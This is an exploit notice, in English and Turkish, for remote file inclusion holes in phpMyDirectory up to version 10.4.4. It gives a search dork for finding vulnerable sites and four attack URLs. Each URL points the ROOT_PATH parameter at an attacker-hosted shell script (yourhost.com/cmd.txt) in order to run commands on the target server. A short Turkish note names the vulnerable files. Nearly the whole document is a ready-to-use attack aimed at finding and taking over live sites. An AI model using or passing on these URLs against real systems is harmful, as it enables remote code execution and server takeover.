phpMyDirectory <= 10.4.4 Multiple Remote File Include(new!)
ENGLISH
# Title : phpMyDirectory <= 10.4.4 Multiple Remote File Include
Vulnerabilities
# Dork : "powered by phpmydirectory"
# Author : ajann
# greetz : Nukedx,TheHacker
# Exploit;
###
http://[target]/[path]/template/default/footer.php?ROOT_PATH=http://yourhost.com/cmd.txt?cmd=ls
###
http://[target]/[path]/template/Yellow/footer.php?ROOT_PATH=http://yourhost.com/cmd.txt?cmd=ls
###
http://[target]/[path]/defaults_setup.php?ROOT_PATH=http://yourhost.com/cmd.txt?cmd=ls
### SOME;
http://[target]/[path]/template/default/test/header.php?ROOT_PATH=http://yourhost.com/cmd.txt?cmd=ls
# ajann,Turkey
TURKISH
# Başlık : phpMyDirectory <= 10.4.4 Multiple Remote File
Include Vulnerabilities
# Sözcük[Arama] : "powered by phpmydirectory"
# Açığı Bulan : ajann
# greetz : Nukedx,TheHacker
# Açık bulunan dosyalar;
###
http://[target]/[path]/template/default/footer.php?ROOT_PATH=http://yourhost.com/cmd.txt?cmd=ls
###
http://[target]/[path]/template/Yellow/footer.php?ROOT_PATH=http://yourhost.com/cmd.txt?cmd=ls
###
http://[target]/[path]/defaults_setup.php?ROOT_PATH=http://yourhost.com/cmd.txt?cmd=ls
### SOME;
http://[target]/[path]/template/default/test/header.php?ROOT_PATH=http://yourhost.com/cmd.txt?cmd=ls
Açıklama:
Temalarda bulunan footer.php dosyası güvenlik açığına yol
açmaktadır.Bu sayede uzaktan kod çalıştırılabilir.
defaults_setup.php kurulumdan sonra silinmemişse aynı açık
uygulanabilmektedir.
test/header.php bölümü ise bazen denk gelmektedir,aynı açık
bulunmaktadır.
Açık 10.4.4 dahil alt sürümlerinde çalışmaktadır.
Thanks.